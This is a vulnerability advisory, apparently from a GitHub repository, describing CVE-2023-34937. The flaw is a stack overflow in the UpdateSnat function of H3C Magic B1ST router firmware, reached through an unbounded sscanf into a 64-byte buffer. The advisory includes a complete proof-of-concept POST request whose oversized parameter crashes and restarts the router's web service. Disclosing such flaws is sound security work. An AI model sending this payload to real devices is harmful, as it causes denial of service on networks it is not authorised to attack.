Headline
CVE-2023-34937: vuln/H3C_B1STW/CVE-2023-34937.md at main · h4kuy4/vuln
A stack overflow in the UpdateSnat function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.
Overview
Vendor: H3C Product: Magic B1ST Version: H3C_Magic_B1STV100R012 Type: Stack Overflow
Vulnerability
In route/goform/aspForm, the value of the key CMD is UpdateSnat, the program will go into the following handling function.
First it get the value of the key param, then use sscanf to copy the the value of param to a array v11 on the stack. In this function, the length of param is limited to 511 Bytes,but v11 only have 64 Byte. Also, the parameter %s of sscanf didn’t limit the copy length.
PoC
POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Content-Length: 320 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.124.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.124.1/wan_new.asp Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN_PSD_REM_FLAG= Connection: close
CMD=UpdateSnat¶m=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Result
the process webs restart